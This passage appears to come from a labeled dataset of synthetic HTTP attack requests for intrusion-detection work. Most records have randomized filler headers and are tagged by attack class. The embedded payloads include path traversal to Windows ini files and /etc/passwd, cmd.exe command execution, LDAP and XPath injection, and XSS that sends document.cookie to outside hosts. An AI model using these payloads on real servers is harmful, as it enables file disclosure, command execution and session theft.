Cookie: ositxtrq6ehdehp=5246;EEhanSDautoexec10vq=r;ooena=mrhiC69utbthi
Cookie2: $Version="408"
Date: Wed, 26 Nov 08 01:26:26 CET
ETag: "RUw27n@HrEB-YAKv"
Expect: 100-continue
From: vlIol@haea.org
If-Modified-Since: Mon, 14 Dec 09 06:24:53 UTC
If-Unmodified-Since: Thu, 12 Apr 07 15:53:26 CET
If-Match: "YfyF@F3US0_N7MgD5oI"
If-None-Match: "@@0ePc4vYQG8BPHB"
If-Range: Tue, 04 Nov 08 24:18:15 GMT
Max-Forwards: 6
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM bmlkZHRkOXNoZGU3dGJ2c2RiZXJQOWEwZXRvbW9lZnNvUlBONQ==
Range: -11289
Referer: http://dtps2nol.org/HTe5ne/yznWi.nsf
TE: chunked,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.4 (Windows; U; WinNT 1.6; gs-eN; rv:7.5.6) Gecko/74337578
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: rmhrf/0.8 170.142.68.76:692, 1.0 192.62.242.106:7
Transfer-Encoding: gzip
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 419 www.riae.jpeg "t4xtspnneyygypw1bdf" "Thu, 20 Aug 09 21:25:22 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41640
Start - Id: 45591
class: PathTransversal
GET /e5Y2IJHEj4_5/Pzj0-GvJgcs/Uhao/yfvroPhT3Tprocessing-instructionrJ6/1aSZuLNqECsIRp8F/iKHt@pcy.4mq./m@MMPLDo/otrn/o47-3-THR6Lf3KK_Xd/ebQ-hPh0j2vjD@FGu/nHE/ppb9xn8pKV0Zk5ea.cfm?egeq8eqe=%3Ernhtpass&b4Eal8armn1a8=Bnp4vn&Ss8ea7aliet9r1=rhvt6awla9&a3R=%28st-afb+&KU2l1k=1690350&w6halj=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&Qive3ie=28276&0oehrctnsociVfh=fpwXaraye5bsw&gu8Wiiuun=tLRhBiLF&evnwbsh=Otmp%27e%3D86tw%5D9neno%3E0ne&jveNeZzhfo4=ajhtpassoddh%7Eu9hd%25taprocessing-instructioneha&ipbb7anhrylN=stdin+lo&iooklEvs9onebj=50261043&belrwesjnlJn=1uZU9YxR3E&raFddstytncre=69286 HTTP/1.0
Host: 114.107.34.134
Connection: 3carop
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 133.101.53.197
Cookie: oolx=ttorMxml ;aessbisoh4n=k
Cookie2: $Version="513"
Date: Wed, 02 Apr 08 15:14:53 CET
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: we9ro
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Mon, 25 Aug 08 12:09:23 CET
If-Unmodified-Since: Sun, 11 Apr 10 05:48:17 GMT
If-Match: "q4t7QLLup-X_Lvm"
If-None-Match: "2uLsDH2YJ7pWDcm"
If-Range: Wed, 26 Aug 09 16:36:37 GMT
Max-Forwards: 735
MIME-Version: 8.1
Pragma: aEhstsse=ej1retgo
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: -3163,-605229
Referer: http://rsesbu.de/soled/iCka8h.msf
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (compatible; MSIE 5.9; Unix; dnerzln0rh; elhn)
UA-CPU: 68000
UA-Disp: 911,8166,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5892x3688
Via: aZrs/9.5 www.eIljbssu.css, FTP/2.3 94.160.84.51:7660
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 125.18.205.103
X-Serial-Number: 90033234881
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45591
Start - Id: 49565
class: XPathInjection
GET /ec1.jpg?QfHQB=sHby.D0Odf-E&Nw=+ai%7CLtwtbssGsystemtwindow.openls&reeoe0vnho=t%26&vztqiame=Et%27++or+++++1%3C++++uaatl%2Faaeze%2Ftc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D37%5D+++++or++++%27ni%27+%3D+%27&n4ittedniab=iork&lolfiurIhdoy=17992674&7eeN8dars=pum9rst&nZonhrozioryr=4&voirwsmeaceydht=768&omonh=36504162&uOsiisinsrnob=mssoesmsyJa%268&llmt=5084434&vaf=4312450 HTTP/1.0
Host: www.fatpTiue.ch
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, identity
Accept-Language: *;q=0.3
Cache-Control: max-stale=5
Client-ip: 229.72.228.0
Cookie: NshutdownZhP=8562;Fttr6eh1wlw2iI=991065
Cookie2: $Version="6"
Date: Sat, 28 Nov 09 05:28:55 UTC
ETag: "1XNKuhfoY0xpvjB27"
Expect: tIeh=qs8napHi
From: hoCeq@bibo4he.ch
If-Modified-Since: Mon, 19 Sep 05 17:29:16 UTC
If-Unmodified-Since: Wed, 30 Nov 05 24:18:47 CET
If-Match: "lpF8capJ.Z..ZT57N"
If-None-Match: *
If-Range: "5jmJ6GnLXhh@J7re5"
Max-Forwards: 275
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: 9a2ilt dswfus7=iredewem
Authorization: Basic dTVzMnI6c2h0cw==
Range: 8-,588-
Referer: http://6esn.de/jsik/ehehlome/iaee/dmerevc.cfm
TE: trailers
Trailer: Range
User-Agent: iEarfReoe8r
UA-CPU: Sparc
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: eso/3.0 154.226.69.16, HTTP/8.8 www.ypltEa.jpeg
Transfer-Encoding: gzip
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49565
Start - Id: 47876
class: XSS
GET /L9qY1-RR.-z/se4l4EU79AJIG/rrccaruih9uOshrilhir.htm?Ehnoasupc0apms=kln0acmgNg%3Ci18uOn%25me&qrqd=hNXgr0H_q&UxPSLZW_FIk=F%40&o5Edwxuhdart=89&sh5gveetirrdo=%3Ciframe++src+%3D+%22++vbscript%3A%5Balert++%28%27Xm%27%29%3B%5D+++++%22++%3E&tmwaie=gbfoUn HTTP/1.1
Host: 198.214.178.173
Connection: keep-alive
Accept: audio/*, video/quicktime, text/xml;q=0.2
Accept-Charset: x-mac-icelandic, x-mac-hebrew;q=0.5, x-mac-roman;q=0.3
Accept-Encoding: deflate, identity;q=0.9, gzip;q=0.4, compress
Accept-Language: ber-i;q=0.2, cLcebate-os;q=0.2, i-Hlee;q=0.1
Cache-Control: pqaf='a'
Client-ip: 85.234.191.196
Cookie: 4ae=|dnxp_motlocationbtkn\rey;heenwht4=cYp
Cookie2: $Version="24"
Date: Fri, 27 Nov 09 22:48:53 CET
ETag: "Nk4jHWlZF1_6AXNPTX"
Expect: lrhe
From: wu4c60i@McindieetT.fr
If-Modified-Since: Wed, 26 Jul 06 03:59:46 GMT
If-Unmodified-Since: Sat, 20 Dec 08 08:35:49 CET
If-Match: *
If-None-Match: *
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 3056
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic aWlsNm86a2h0eQ==
Authorization: Digest realm
Range: 064-,-6198,422476-
Referer: http://ltheep9.ch/rtg0/e6nteete/roaeoeiK/weYwlSco/hkxpma.pl
TE: trailers,chunked,gzip;q=0.9
Trailer: Accept
User-Agent: mr70ee/1.1.7
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: HTTP/0.0 47.6.191.167, FTP/2.8 72.223.118.70, 3.1 59.64.29.217
Transfer-Encoding: compress
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 417 www.nmwhs.jpg "hngvi5nseoeon" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47876
Start - Id: 39065
class: LdapInjection
POST /Ea3umtG61Ecs8/s-_ZGCJlJRjQ.js? HTTP/1.1
Content-Length: 132
Content-Language: 7Zm4oeo,oaph,u
Content-Encoding: compress
Content-Location: http://www.si3st.org/yssoh/nsdtadr/wectfer/wndN.jpeg
Content-MD5: bnNlbGlvcjlpYm9zZW5lVQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jan 08 21:13:43 UTC
Last-Modified: Sat, 09 Sep 06 08:46:22 GMT
Host: 140.103.251.248:94
Connection: close
Accept: */*
Accept-Charset: iso-8859-4;q=0.9, iso-8859-1;q=0.4, utf-7;q=0.3
Accept-Encoding: *
Accept-Language: l-oeeeo;q=0.4, cdds-rjoE;q=0.0
Cache-Control: min-fresh=28
Client-ip: 239.175.77.189
Cookie: he=Q5seanoaleCPgmsr;iat=19324;nafewlsEnpzws=)   ( |    (displayName=had*)  (name    =had*    )(    mail=had*  );atyd6psiln=m2Rro;XdpdKy_5=mgi;NMOJgAo0KU2=5740541297
Cookie2: $Version="26"
Date: Tue, 17 Feb 04 05:30:54 GMT
ETag: ".MyAxfyG-wPe1WiRrUQq"
Expect: euedthe
From: ct0nt@neotdaE7.cz
If-Modified-Since: Sat, 15 Jan 05 13:03:36 GMT
If-Unmodified-Since: Tue, 26 Jul 05 22:04:41 GMT
If-Match: "IkhXLI5v3tFJ8REGUC-"
If-None-Match: *
If-Range: *
Max-Forwards: 3538
MIME-Version: 4.2
Pragma: pdOon=nsiye
Proxy-Authorization: Digest response="bc4244b1f0ed32c2C5fBb2dF8b3fa903"
Authorization: Basic TXV5ZVU6bmx3dDI=
Range: 42453-074211
Referer: /hooexT.sh
TE: gzip
Trailer: Cache-Control
User-Agent: phtym (oZfaI@zk-T; 2Jg@LSHLY; iPM3aMs)
UA-CPU: MIPS
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0434x6105
Via: 0.7 www.oohr99.jpg, 0.1 239.57.184.170, 0.5 61.129.191.6:094
Transfer-Encoding: deflate
Upgrade: oe8sa5/3.6, asot/7.7, vIoul/0.4, Oitiff/6.5
Warning: 211 www.piasdijr.htm "ihnhjse" "Fri, 11 Mar 05 22:53:07 CET"
X-Serial-Number: 53018392304378
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yyt=iaer&uEco2YMcopyC=at)oartstyless7t07B&jatgj=razLwccTrbe&nda=&%scriptie&bocruet2n8=hl_&_w8ihLvm6=set&eT=pltd5&lexfhaH=mieay

End - Id: 39065
Start - Id: 43042
class: OsCommanding
PUT /hmdtbeogiTrf/u4hLirepEnqltwdhaa/9rCuNsttrfieWl/d4S-UqDibCvTRVJp@3W/nBD_15RLtmb/a2UU3bxxG2UHsKM-j_Vu/Dzn3srumvf/oagNdPrq.gif? HTTP/1.0
Content-Length: 91
Content-Language: t2naswth,ane7hN,ciae
Content-Encoding: gzip
Content-Location: http://oeeez.st/aoeseicu/2dthr/beeapt/neamci.mpeg
Content-MD5: bnRodXM1dGluNnVudXBlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 12:46:30 UTC
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: www.uplgireqwI.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.0, compress
Accept-Language: wog-1io3m, pd5pir-y;q=0.2, agjrv-atuti;q=0.2, ae8ama-emniefad;q=0.2, t9la-cmdrajZe
Cache-Control: no-store
Client-ip: 121.29.110.84
Cookie: gga=nl>a;sv3AtE4=7399;tgatgA=796;k0zHpasswdq=snIwV@Xm
Cookie2: $Version="447"
Date: Sun, 22 Mar 09 04:16:15 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: a0ee@enelreh.it
If-Modified-Since: Tue, 22 May 07 22:09:41 GMT
If-Unmodified-Since: Mon, 24 Nov 08 06:12:27 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: "9ZeuzdNhr24f44h"
If-Range: Thu, 29 Mar 07 08:50:19 UTC
Max-Forwards: 3
Pragma: no-cache
Proxy-Authorization: titoh aivw=aonsbe
Authorization: Digest algorithm=p6ieY9
Range: -98633,070828-,-9277
Referer: http://tsNyp.st/dladlGns/ea4iRteg/ibqn.php
TE: trailers,trailers,chunked;q=0.8
Trailer: From
User-Agent: Mozilla/0.9 (Windows; U; WinNT 2.1; ot-ea; rv:9.0.2) Gecko/33010841
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: HTTP/4.4 68.103.204.17, oER/4.5 227.47.97.62
Transfer-Encoding: gzip
Upgrade: sin/4.4, nanj/1.1, sfgit/8.7, sxHu/2.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e7j=nUklhCG&trEt8qls=/../../../../../../../bin/cat    /etc/passwd |

End - Id: 43042
Start - Id: 47718
class: XSS
GET /fltihfj6i/n2rS5ner/se/o51ta0qxsE8OtBjH/andMmochaVbKry/rpbba6/6rHsAnoUeier/ehestePlsonrnr/im2rTgtDTSS7.El.6/boaK__/ecx-DZy5WLv.bin?odra=66nnfonindqiNt&ieohtr=NNoeSs2bthernu&i6r=scsB7arsbi&meaqwlN5=353&eitdnndmH6olp=%3Cimg+++dynsrc++++%3D+++%22javascript%3A++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.maanng.com%2Fcgi-bin%2Fns.cgi%27%2Bdocument.cookie%29%3B%5D+%22++++%3E HTTP/1.1
Host: www.9aytpoaltn.com
Connection: close
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312;q=0.8, x-mac-chinesesimp;q=0.1, x-mac-arabic;q=0.3, koi8, iso-8859-5
Accept-Encoding: *;q=0.8
Accept-Language: eD-W, dtoadllw-iool;q=0.5
Cache-Control: min-fresh=7180
Client-ip: 19.23.57.184
Cookie: omc8T=pihg;tgeern=httpeA;s5luar=w;hqurT0pgn=t2El;dhqH=nse
Cookie2: $Version="6"
Date: Fri, 02 Feb 07 07:17:38 GMT
ETag: W/".Yvf.hV0JUrMVXmG"
Expect: 100-continue
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Wed, 16 Mar 05 20:51:28 CET
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: "1o83EFYH4c9k9cMbn7"
If-None-Match: "gzKqJlOfF.bFpsguW."
If-Range: Thu, 18 Aug 05 18:57:21 CET
Max-Forwards: 770
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: NTLM ZWRlZ2tidHJjbTlzbXNkNU50ZTNJNG9zaXdudGV1ZWFuaTdF
Range: 2174-,56-,-57382
Referer: /nHnSol/dgvpj.msf
TE: chunked;q=0.4
Trailer: Date
User-Agent: 7jon (ffOqK-38-0; in@374qB; isiPidonNh)
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5167x472
Via: 6.0 www.gem9.js, 4.9 68.33.210.1:260, djl/9.9 www.m5ord1.html
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47718
Start - Id: 47840
class: XSS
GET /oOgcbNnC8/tFPmtE1Wfox1VRpyxldx/Vo8r4wabaois8ent1l93/XndFd6l-aSR/du/ilBPT_.@.jpg?wrct21Lshqstuo=82362034&inrdwlok0rva=h%3FdoUyvdnctib&rifgWOr=%3Cimg+++src++%3D+++%22+livescript%3A%5Bwindow.open%28%27http%3A%2F%2F116.19.183.36%2Foltall.nsf%27%2Bdocument.cookie%29%3B%5D++++++%22+%3E&n0tn=jx9&fet95cTn=eHsdtzs&tN7armeam=69&w0oa3qhidt=9co&nittAernhood2i=1esI1me8do7zduSg&@rK0link=wHwFitCeHtqr HTTP/1.0
Host: 10.209.13.165:80
Connection: nmsnsxd
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.4, compress, compress, gzip;q=0.4, compress
Accept-Language: 9l8-ibuhoqv6;q=0.2, cinen-i, cttFAata-tn9atie2;q=0.4, oyahr-ieews
Cache-Control: max-age=60608
Client-ip: 145.49.48.15
Cookie: Vc0tonedye4T=953381;cresaarHDj=1;eFcLpJKx51.=30516185
Cookie2: $Version="459"
Date: Thu, 11 Mar 10 15:26:00 GMT
ETag: "dhh4oVNZRH_AtKMGN_Ng"
Expect: hnkndi8=thtmdr
From: rntaoh@dim7.fr
If-Modified-Since: Mon, 22 May 06 06:49:15 GMT
If-Unmodified-Since: Sat, 17 Apr 04 11:27:20 GMT
If-None-Match: *
If-Range: "L1pBSGEMNIT-en7_6M"
Max-Forwards: 459
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: NTLM ZXNkb2xlbWR4bkFuZWZ1d3I2aGlJVG5lc2lhaG90dm5UckVyZU8=
Referer: /tl8nbvss/ebnwa/e4nlqmp/biqtik/ihhiEbxs.sh
TE: chunked,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: Mozilla/0.0 (compatible; aohnodr1on; Windows NT; b5htn1qg; eeraatho12)
Via: HTTP/2.2 179.79.202.67
Transfer-Encoding: identity
Upgrade: dse/3.9, erre/3.1, jAtMM/7.7, eexzD/7.4
Warning: 297 www.wzsizre.html:14 "rgdedqieE" "Thu, 23 Dec 04 01:45:46 CET"
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47840
Start - Id: 47822
class: XSS
GET /bijryLny13/eWiFMHrx1cZyWBu1W/sWJfvo/edaEtthu4elo8b/eH1NcVEXBEqv/RDFu4y5.JTN3av/3i.QgV_aRLX/WxTnxolun/lw6UzptsMi6IiGW2/ene/rhuE1ee.css?WJV6n9_nIy=35136&koaehe8mhe=tnftuaeAacuCoxedil&citdntbsra5g=kU0J&eAi9eDn=88179186&ehOsI2r6=%290Dbnt%3E&etaRsiziI=%26%7B%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.ve.com%2Fcgi-bin%2Ftrngri.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&cousetsem7kd=97759 HTTP/1.0
Host: 95.134.107.193:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-9, utf-8, isiri-3342;q=0.9, x-mac-hebrew;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 106.65.144.196
Cookie: 2nra5yennme=a
Cookie2: $Version="3"
Date: Thu, 22 Dec 05 17:12:51 CET
ETag: W/"OurwtpibD7A0noXC"
Expect: dolnme=tdvee;csddfa
From: aelcese@ohx6uolgc.ch
If-Modified-Since: Mon, 20 Sep 04 19:28:13 UTC
If-Unmodified-Since: Sun, 12 Feb 06 16:25:34 GMT
If-Match: "p-welNPhrxXlmUAh0"
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: "Lup-HA1c3p_VigCgcO2R"
Max-Forwards: 4983
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: NTLM YWJvYXBzbmNuZWhrbHNlT05taHR0dHRJYWlpbktpdGlnZG1t
Range: 2820-37,-5180,81-
Referer: http://i56tnao.net/ocuu0lv/ettRpo/liROaeem/v5pas/rcRrEN.doc
TE: gzip;q=0.1
Trailer: TE
User-Agent: Tneiery/1.4.9.6.1
UA-CPU: MIPS
UA-Disp: 9028,3177,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 907x206
Via: 2.5 www.rdSU.tiff, 5.0 www.htgoeawA.tiff, 0.4 www.atnmccca.png
Transfer-Encoding: identity
Upgrade: tt5hfe/7.3
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 4290166735414174
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 47822
Start - Id: 45056
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.etkaedtats.ch
Connection: tuoh
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 4.109.212.12
Cookie: YmailPR5o1.wHIe=aD4ys%ieroptZ$e\ozms;mzre=38150;hi3bRn=42952258;elrw0jwtrohE=hzpKys
Cookie2: $Version="8"
Date: Sun, 25 Apr 10 10:20:32 GMT
ETag: W/"VI05iHgMeDWsSIG"
Expect: 100-continue
From: Otai@40ezesm.uk
If-Modified-Since: Fri, 02 Jan 09 19:40:31 UTC
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: "rIGsar_3oCllg8h0ZHB"
If-None-Match: "GoqdBXduDrkbwhfn6"
If-Range: Sun, 09 Jan 05 05:47:04 CET
Max-Forwards: 67
Pragma: no-cache
Authorization: Basic aTluZTp0NjJ3cw==
Range: 09453-71450,00-30
Referer: http://www.ekte7.org/j7obaeb/riqbqE/xaam5/e2ax/ymuh.asmx
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/9.2 (Windows; U; WinNT 2.0; t5-hs; rv:3.1.3) Gecko/34359853
UA-CPU: MIPS
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: 8.1 www.sb7Lwe.jpeg
Transfer-Encoding: deflate
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 055 85.8.178.117 "rMtdnroe0tr7el" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 23020199164875
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45056
Start - Id: 44082
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.Aa5Nen.cz
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1255;q=0.0, cp-950, x-mac-turkish
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 118.75.169.199
Cookie: dI2osteaqagde=omavrtjUg;rtlae=pqB5fx2I.j4p;iYLznl@P5GnX=8126;fah7risrf4htp=0139
Cookie2: $Version="4"
Date: Sat, 11 Nov 06 22:28:56 UTC
ETag: W/".Z.c4.xeA3kSTWv"
Expect: ugrhejx
From: eyde@enOee.biz
If-Modified-Since: Fri, 16 Nov 07 05:28:22 CET
If-Unmodified-Since: Sat, 18 Sep 04 02:04:38 CET
If-Match: *
If-None-Match: "BrqWlOEAFHZQeSQ"
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 7273
MIME-Version: 3.7
Pragma: o8na='dama'
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: http://cscma.fr/rlstde/tAtm/ilvn.nsf
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: w2IEZ9 http://www.evntEmwt.st
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 044x211
Via: FTP/8.9 206.36.6.237:3, 7.6 www.onAh.html:0
Transfer-Encoding: 2cou23
Upgrade: unHis2/9.7, sDw/8.7
Warning: 085 103.13.130.10 "4nt6qytseorniY" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44082
Start - Id: 38575
class: LdapInjection
GET /servicesXf7S99execI0otk6.jpg?so=XN7&ae3i5teaitjts=aoewntedobjecte+n&je6sazXioolla=stsAreaApoonbdig&rnesd=tronai&aml7a9ur=nzotwS0dITe&aH@r0=7555&tpuf7veYtmooats=%29%28+%7C++++%28displayName%3Dhad*%29%28name+++%3Dhad*+%29%28++mail%3Dhad*++++%29&26raes=nta&ae=ecm%3D&5metaXCO=6436186&teuo8rrwid=sot&yshsbsafrmrFrqa=+r+Eunion HTTP/1.0
Host: 18.182.184.169
Connection: I8dm
Accept: text/plain;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: j8ngia9Z='gea7isar'
Client-ip: 231.216.109.79
Cookie: 9mlao4=735565;do9=lo;sn1nnr=u0kilofaokggot;Est=525752
Cookie2: $Version="987"
Date: Sun, 04 Apr 10 19:32:16 CET
ETag: "qAxc.1akzYKJs3O8J1o0"
Expect: UpT3s
From: snaN@sfjo15.ch
If-Modified-Since: Sun, 19 Dec 04 10:41:41 UTC
If-Unmodified-Since: Wed, 02 Feb 05 23:38:43 GMT
If-Match: "dilbic2rBdLeSeaM"
If-None-Match: *
If-Range: "BThNi3wOSgE5rcnYQf8m"
Max-Forwards: 4
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic YXRkdzJsSXI6ejJ0Zmlp
Authorization: NTLM bmxuYW9paTlrNHh0dHdlb21sZTNqZWF2N2R4dHNzYXVvbmI=
Range: -5
Referer: /ih7ton/rgul.swf
TE: chunked;q=0.2,chunked,chunked;q=0.0
Trailer: Proxy-Authorization
User-Agent: rogrihoprlTLbej9eeo
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 639x8095
Via: FTP/1.2 153.237.119.41
Transfer-Encoding: compress
Upgrade: ksu/7.2, ear/3.1
Warning: 767 180.228.227.71 "tniR" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38575
Start - Id: 38448
class: LdapInjection
GET /oH/ccir1p9e2saaO9g2/lene27jahdrU/Pilset3NuTahhpnn6zl/e4zosc5oXGuhr/lWAnxbb51KLj2plxLmW/iYjP7WCdjLx--zH@b/4K.tiff?gyIq=oren%5D&po=i9ooPtkE6D&torahevedZqove=tKmhBRFl&Dshia5anSaodul=a&update1w79=AEh%29%28%26%28objectClass+%3D++++uf*%29&xetiHnwrj=ecLQO&oEstsraiDi=v50&hrhbsrtna=tiiservicess&larm8m7=tbme-sOaP&ngfnteaAibue=oysqkau&st=8881266020 HTTP/1.0
Host: www.tshqn.be
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.2
Accept-Language: *;q=0.5
Cache-Control: min-fresh=27
Client-ip: 131.162.142.41
Cookie: PbBpSKS=a;w4loXaD3vbscript0m=n3Y;e6li3w1n=7
Cookie2: $Version="93"
Date: Sun, 21 Mar 10 09:08:14 GMT
ETag: "G3Txigpimi-nkqSesa"
Expect: ntiiwopb
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Sat, 21 Mar 09 04:21:28 CET
If-Unmodified-Since: Tue, 23 Sep 08 19:26:45 GMT
If-Match: "ZOEEk_lEKJJYWVnLJm"
If-None-Match: "T8g1vDP.2RYgB8rzpg"
If-Range: Mon, 15 Sep 08 15:15:28 CET
Max-Forwards: 865
MIME-Version: 3.3
Pragma: t0aetAe=hcsPsd
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest nonce
Range: 86309-
Referer: /hseEerrn/6eanhot0/ybsOma/rn6etr4/iwt0.fgf
TE: deflate;q=0.1,chunked
Trailer: If-Range
User-Agent: nRUy1BbJ http://www.stassE.it
UA-CPU: 68000
UA-Disp: 945,9874,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.9 67.169.5.10, rxIe/0.5 www.Rsry.jpg, FTP/8.1 www.itA3T.gif
Transfer-Encoding: identity
Upgrade: f6Ter/0.9
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38448
